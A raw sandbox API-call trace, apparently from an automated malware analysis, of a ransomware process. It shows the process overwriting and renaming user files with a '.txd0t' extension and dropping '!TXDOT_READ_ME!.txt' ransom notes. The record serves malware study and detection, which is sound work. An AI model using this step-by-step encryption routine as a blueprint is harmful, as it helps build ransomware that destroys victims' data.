lpNumberOfBytesWritten=0x37ff424*=0x11000, lpOverlapped=0x0) returned 1 [0089.618] FlushFileBuffers (hFile=0x478) returned 1 [0089.988] GetProcessHeap () returned 0xe30000 [0089.988] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x132) returned 0xec5de0 [0089.989] StrCpyW (in: psz1=0xec5de0, psz2="\\\\?\\C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx" | out: psz1="\\\\?\\C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned="\\\\?\\C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx" [0089.989] PathFindFileNameW (pszPath="\\\\?\\C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx") returned="Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx" [0089.989] StrCpyW (in: psz1=0xec5df8, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0089.989] PathFileExistsW (pszPath="\\\\?\\C:\\Logs\\!TXDOT_READ_ME!.txt") returned 1 [0089.989] GetProcessHeap () returned 0xe30000 [0089.989] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec5de0 | out: hHeap=0xe30000) returned 1 [0089.989] CloseHandle (hObject=0x478) returned 1 [0089.989] MoveFileW (lpExistingFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx" (normalized: "c:\\logs\\microsoft-windows-wininet-config%4proxyconfigchanged.evtx"), lpNewFileName="\\\\?\\C:\\Logs\\Microsoft-Windows-WinINet-Config%4ProxyConfigChanged.evtx.txd0t" (normalized: "c:\\logs\\microsoft-windows-wininet-config%4proxyconfigchanged.evtx.txd0t")) returned 1 [0089.989] SetEvent (hEvent=0x3f8) returned 1 [0089.990] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0090.100] StrCpyW (in: psz1=0x37ff490, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Database1.accdb" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Database1.accdb") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Database1.accdb" [0090.100] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Database1.accdb", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Database1.accdb.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Database1.accdb.txd0t" [0090.100] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Database1.accdb.txd0t") returned 0 [0090.101] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Database1.accdb", dwFileAttributes=0x80) returned 1 [0090.104] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Database1.accdb" (normalized: "c:\\users\\fd1hvy\\documents\\database1.accdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0090.104] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=348160) returned 1 [0090.104] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.104] WriteFile (in: hFile=0x474, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0090.105] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffaae00, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.105] ReadFile (in: hFile=0x474, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x55000, lpNumberOfBytesRead=0x37ff450, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff450*=0x55000, lpOverlapped=0x0) returned 1 [0090.114] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffab000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.115] WriteFile (in: hFile=0x474, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x55000, lpNumberOfBytesWritten=0x37ff454, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff454*=0x55000, lpOverlapped=0x0) returned 1 [0090.116] FlushFileBuffers (hFile=0x474) returned 1 [0090.119] GetProcessHeap () returned 0xe30000 [0090.119] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x102) returned 0xe9d750 [0090.119] StrCpyW (in: psz1=0xe9d750, psz2="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Database1.accdb" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Database1.accdb") returned="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Database1.accdb" [0090.119] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Database1.accdb") returned="Database1.accdb" [0090.119] StrCpyW (in: psz1=0xe9d78c, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0090.119] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Documents\\!TXDOT_READ_ME!.txt") returned 1 [0090.119] GetProcessHeap () returned 0xe30000 [0090.119] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d750 | out: hHeap=0xe30000) returned 1 [0090.119] CloseHandle (hObject=0x474) returned 1 [0090.119] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Database1.accdb" (normalized: "c:\\users\\fd1hvy\\documents\\database1.accdb"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Documents\\Database1.accdb.txd0t" (normalized: "c:\\users\\fd1hvy\\documents\\database1.accdb.txd0t")) returned 1 [0090.121] SetEvent (hEvent=0x3f8) returned 1 [0090.121] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0090.284] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms") returned="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms" [0090.284] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms.txd0t" [0090.284] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms.txd0t") returned 0 [0090.284] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms", dwFileAttributes=0x80) returned 1 [0090.285] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\fd1hvy\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0090.285] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=248) returned 1 [0090.285] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.285] WriteFile (in: hFile=0x474, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0090.287] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffffd08, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.287] ReadFile (in: hFile=0x474, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0xf0, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0xf0, lpOverlapped=0x0) returned 1 [0090.287] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffffff10, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.287] WriteFile (in: hFile=0x474, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0xf0, lpOverlapped=0x0) returned 1 [0090.287] FlushFileBuffers (hFile=0x474) returned 1 [0090.289] GetProcessHeap () returned 0xe30000 [0090.289] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x10a) returned 0xed2440 [0090.289] StrCpyW (in: psz1=0xed2440, psz2="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms") returned="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms" [0090.289] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms") returned="Everywhere.search-ms" [0090.289] StrCpyW (in: psz1=0xed247a, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0090.289] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Searches\\!TXDOT_READ_ME!.txt") returned 0 [0090.289] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Searches\\!TXDOT_READ_ME!.txt" (normalized: "c:\\users\\fd1hvy\\searches\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x464 [0090.290] WriteFile (in: hFile=0x464, lpBuffer=0x37ff474*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x37ff470, lpOverlapped=0x0 | out: lpBuffer=0x37ff474*, lpNumberOfBytesWritten=0x37ff470*=0x2, lpOverlapped=0x0) returned 1 [0090.290] FlushFileBuffers (hFile=0x464) returned 1 [0090.292] WriteFile (in: hFile=0x464, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x37ff470, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x37ff470*=0x7f0, lpOverlapped=0x0) returned 1 [0090.293] FlushFileBuffers (hFile=0x464) returned 1 [0090.294] CloseHandle (hObject=0x464) returned 1 [0090.294] GetProcessHeap () returned 0xe30000 [0090.294] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed2440 | out: hHeap=0xe30000) returned 1 [0090.294] CloseHandle (hObject=0x474) returned 1 [0090.294] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\fd1hvy\\searches\\everywhere.search-ms"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Everywhere.search-ms.txd0t" (normalized: "c:\\users\\fd1hvy\\searches\\everywhere.search-ms.txd0t")) returned 1 [0090.295] SetEvent (hEvent=0x3f8) returned 1 [0090.295] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0090.296] StrCpyW (in: psz1=0x37ff470, psz2="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms") returned="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms" [0090.296] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms.txd0t" [0090.296] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms.txd0t") returned 0 [0090.296] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms", dwFileAttributes=0x80) returned 1 [0090.296] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\fd1hvy\\searches\\indexed locations.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0090.296] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=248) returned 1 [0090.296] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.296] WriteFile (in: hFile=0x474, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0090.299] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffffd08, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.299] ReadFile (in: hFile=0x474, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0xf0, lpNumberOfBytesRead=0x37ff430, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff430*=0xf0, lpOverlapped=0x0) returned 1 [0090.299] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xffffff10, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.299] WriteFile (in: hFile=0x474, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x37ff434, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff434*=0xf0, lpOverlapped=0x0) returned 1 [0090.299] FlushFileBuffers (hFile=0x474) returned 1 [0090.306] GetProcessHeap () returned 0xe30000 [0090.306] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x118) returned 0xed1c70 [0090.306] StrCpyW (in: psz1=0xed1c70, psz2="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms") returned="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms" [0090.306] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms") returned="Indexed Locations.search-ms" [0090.306] StrCpyW (in: psz1=0xed1caa, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0090.306] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Searches\\!TXDOT_READ_ME!.txt") returned 1 [0090.306] GetProcessHeap () returned 0xe30000 [0090.306] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed1c70 | out: hHeap=0xe30000) returned 1 [0090.306] CloseHandle (hObject=0x474) returned 1 [0090.307] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\fd1hvy\\searches\\indexed locations.search-ms"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Searches\\Indexed Locations.search-ms.txd0t" (normalized: "c:\\users\\fd1hvy\\searches\\indexed locations.search-ms.txd0t")) returned 1 [0090.307] SetEvent (hEvent=0x3f8) returned 1 [0090.307] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0090.381] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" | out: psz1="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" [0090.381] StrCatW (in: psz1="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.txd0t") returned="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.txd0t" [0090.381] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.txd0t") returned 0 [0090.381] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms", dwFileAttributes=0x80) returned 1 [0090.381] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x474 [0090.382] GetFileSizeEx (in: hFile=0x474, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=960) returned 1 [0090.382] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.382] WriteFile (in: hFile=0x474, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0090.383] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffffa40, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.383] ReadFile (in: hFile=0x474, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x3c0, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0x3c0, lpOverlapped=0x0) returned 1 [0090.383] SetFilePointerEx (in: hFile=0x474, liDistanceToMove=0xfffffc40, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.384] WriteFile (in: hFile=0x474, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x3c0, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0x3c0, lpOverlapped=0x0) returned 1 [0090.384] FlushFileBuffers (hFile=0x474) returned 1 [0090.386] GetProcessHeap () returned 0xe30000 [0090.386] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x10e) returned 0xed28a0 [0090.386] StrCpyW (in: psz1=0xed28a0, psz2="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" | out: psz1="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" [0090.386] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms") returned="RecordedTV.library-ms" [0090.386] StrCpyW (in: psz1=0xed28dc, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0090.386] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\Public\\Libraries\\!TXDOT_READ_ME!.txt") returned 0 [0090.386] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Libraries\\!TXDOT_READ_ME!.txt" (normalized: "c:\\users\\public\\libraries\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0090.389] WriteFile (in: hFile=0x460, lpBuffer=0x37ff474*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x37ff470, lpOverlapped=0x0 | out: lpBuffer=0x37ff474*, lpNumberOfBytesWritten=0x37ff470*=0x2, lpOverlapped=0x0) returned 1 [0090.389] FlushFileBuffers (hFile=0x460) returned 1 [0090.392] WriteFile (in: hFile=0x460, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x37ff470, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x37ff470*=0x7f0, lpOverlapped=0x0) returned 1 [0090.392] FlushFileBuffers (hFile=0x460) returned 1 [0090.393] CloseHandle (hObject=0x460) returned 1 [0090.393] GetProcessHeap () returned 0xe30000 [0090.393] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed28a0 | out: hHeap=0xe30000) returned 1 [0090.393] CloseHandle (hObject=0x474) returned 1 [0090.393] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Libraries\\RecordedTV.library-ms.txd0t" (normalized: "c:\\users\\public\\libraries\\recordedtv.library-ms.txd0t")) returned 1 [0090.394] SetEvent (hEvent=0x3f8) returned 1 [0090.394] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0091.391] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0092.394] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0093.507] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0094.569] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0095.633] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0096.716] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0097.762] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0098.820] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0099.890] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0101.048] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0102.566] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0104.279] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0105.366] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0106.467] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0107.554] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0108.726] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0110.706] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0114.067] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0116.261] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0117.557] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0119.090] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0120.095] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0121.105] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0122.120] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0123.141] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0124.195] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0125.276] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0126.292] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0127.309] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0128.722] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0129.797] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0130.812] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0131.844] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0132.998] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0134.502] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0137.981] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0139.144] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0140.552] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0141.554] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0142.570] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0143.615] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x102 [0144.715] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) Thread: id = 12 os_tid = 0x428 [0070.131] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x102 [0071.442] WaitForSingleObject (hHandle=0x408, dwMilliseconds=0x3e8) returned 0x0 [0072.143] StrCpyW (in: psz1=0x414f690, psz2="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\0R6G zd4i6nTDGa8VNm.png" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\0R6G zd4i6nTDGa8VNm.png") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\0R6G zd4i6nTDGa8VNm.png" [0072.143] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\0R6G zd4i6nTDGa8VNm.png", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\0R6G zd4i6nTDGa8VNm.png.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\0R6G zd4i6nTDGa8VNm.png.txd0t" [0072.143] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\0R6G zd4i6nTDGa8VNm.png.txd0t") returned 0 [0072.143] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\0R6G zd4i6nTDGa8VNm.png", dwFileAttributes=0x80) returned 1 [0072.144] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\AppData\\Roaming\\0R6G zd4i6nTDGa8VNm.png" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\0r6g zd4i6ntdga8vnm.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0072.144] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x414fc4c | out: lpFileSize=0x414fc4c*=30344) returned 1 [0072.144] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.144] WriteFile (in: hFile=0x46c, lpBuffer=0x414f930*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x414fc48, lpOverlapped=0x0 | out: lpBuffer=0x414f930*, lpNumberOfBytesWritten=0x414fc48*=0x200, lpOverlapped=0x0) returned 1 [0072.144] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xffff8778, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.144] ReadFile (in: hFile=0x46c, lpBuffer=0x380d020, nNumberOfBytesToRead=0x7680, lpNumberOfBytesRead=0x414f650, lpOverlapped=0x0 | out: 